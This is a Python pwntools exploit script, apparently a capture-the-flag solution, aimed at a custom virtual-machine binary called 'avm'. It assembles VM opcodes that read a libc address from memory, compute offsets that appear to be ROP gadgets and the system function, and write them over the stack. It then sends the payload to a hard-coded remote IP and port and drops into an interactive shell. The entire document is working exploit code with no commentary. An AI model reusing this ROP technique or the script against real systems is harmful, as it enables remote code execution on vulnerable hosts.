1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60
| from pwn import * context.terminal = ['tmux','splitw','-h'] GOLD_TEXT = lambda x: f'\x1b[33m{x}\x1b[0m' EXE = './avm'
ADD = 1 SUB = 2 MUL = 3 DIV = 4 XOR = 5 AND = 6 LSHIFT = 7 RSHIFT = 8 STORE = 9 LOAD = 10
def payload(lo: int): global sh if lo: sh = process(EXE) if lo & 2: gdb.attach(sh, 'b *$rebase(0x1afc)\nb *$rebase(0x1aaf)\n') else: sh = remote('39.105.102.220', 26719) libc = ELF('/home/Rocket/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6')
leak = 0x29d90 def assemble(buf: bytearray, op: int, dst: int, reg1: int, reg2: int): buf.extend(p32((op << 28) + (reg2 << 16) + (reg1 << 5) + dst))
def construct(buf: bytearray, dst: int, num: int): stack = [] while num: stack.append(num & 1) num >>= 1 while stack: if stack.pop(): assemble(buf, ADD, dst, dst, 1) if len(stack) > 0: assemble(buf, LSHIFT, dst, dst, 1) assemble(buf, ADD, dst, dst, 2)
ops = bytearray() assemble(ops, LOAD, 2, 0, 0xd38) assemble(ops, LOAD, 1, 0, 0xd30) construct(ops, 3, 0x2a3e5 - leak) construct(ops, 4, 0x1d8678 - leak) construct(ops, 5, 0x50d70 - leak) construct(ops, 6, 0x2a3e6 - leak) assemble(ops, STORE, 3, 0, 0x118) assemble(ops, STORE, 4, 0, 0x120) assemble(ops, STORE, 6, 0, 0x128) assemble(ops, STORE, 5, 0, 0x130)
sh.sendafter(b'opcode', bytes(ops))
sh.clean() sh.interactive() sh.close()
|